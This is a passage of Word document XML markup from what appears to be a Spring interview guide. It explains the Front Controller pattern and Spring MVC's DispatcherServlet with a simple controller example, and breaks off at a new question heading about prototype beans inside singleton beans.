      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MVC (Model-View-Controller)</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture, to handle and centralize incoming requests. It serves as a single entry point for all client requests and delegates these requests to the appropriate handler (typically controllers or view resolvers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B12F96" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Responsibilities of the Front Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527B4B75" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1865"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Single Entry Point</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It acts as a central controller that handles all incoming requests from the client (browser, API client, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0AA9A9" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1865"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Request Dispatching</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It dispatches requests to appropriate handlers, which can be other controllers, services, or business logic layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B9049" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1865"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unified Control</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a centralized place for processing common tasks such as logging, authentication, authorization, and request preprocessing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B1CD5" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1865"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Forwarding Requests</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Front Controller forwards the request to the appropriate handler or view after processing, ensuring the separation of concerns between the web layer and business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DE8D4" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9D17F" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1866"/>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A client (such as a browser) sends an HTTP request to the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6F617" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1866"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Front Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usually a central servlet or class) intercepts this request and processes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB9B0F" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1866"/>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The Front Controller checks the request and maps it to an appropriate handler or controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D686BF6" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1866"/>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The Front Controller passes the request to the handler or controller, where the actual business logic is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A028A37" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1866"/>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The controller returns a response (often a view or data in the case of REST), which the Front Controller forwards back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D559D" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of the Front Controller Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294A6EFC" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1867"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Centralized Request Management</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All requests go through a single entry point, making it easier to manage and configure routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27907245" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1867"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code Reusability and Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Common tasks like logging, authentication, and authorization can be handled in one place rather than scattered across multiple controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7C87CC" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1867"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Separation of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Business logic, presentation logic, and request handling are decoupled and kept separate, improving the clarity and organization of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237288EF" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1867"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistent Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Error handling and exception management can be centralized in the Front Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFBFAFC" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example in Spring MVC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD87E4D" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the DispatcherServlet acts as the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Front Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It intercepts all incoming HTTP requests and delegates them to appropriate controllers or handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872010C" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps in Spring MVC Front Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F2896" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1868"/>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A user sends a request (e.g., accessing /home).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE4ECAB" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1868"/>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The DispatcherServlet (Front Controller) receives the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45581E6F" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1868"/>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The DispatcherServlet consults the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine which controller should handle the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609458A5" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1868"/>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The request is passed to the correct controller, and the controller processes the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619A75B" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1868"/>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The controller returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object, containing the model data and view name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113619BD" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1868"/>
        </w:num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The DispatcherServlet uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to render the appropriate view (e.g., JSP or Thymeleaf template) and sends the response back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63862CAB" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C8120" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A27CC5" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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public class HomeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12996ABC" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A0679E" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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    @RequestMapping("/home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3F083" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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    public String homePage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581EC2CE" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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        return "home";  // Returns "home.jsp" or "home.html" depending on the view resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24445C" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F4A00" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA6ADE6" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this case, the DispatcherServlet (the Front Controller) routes the /home request to the homePage() method in HomeController. It then resolves the view to render (such as home.jsp or home.html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A50D4" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABD405" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="00CE4B95" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Front Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an essential design pattern in web applications, centralizing the request handling process. It simplifies the routing of requests, enables common processing tasks like logging and authentication, and helps maintain a clean separation of concerns. In modern frameworks like Spring MVC, the DispatcherServlet serves as an implementation of the Front Controller pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E17B40" w14:textId="13C8D046" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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162BBBC">
          <v:rect id="_x0000_i2108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C79BBE6" w14:textId="3480DD19" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C9664F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="_Toc196307919"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If I have prototype bean and singleton bean, then how can we call prototype beans inside singleton</w:t>
      </w:r>
      <w:r w:rsidR="00A66A4A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
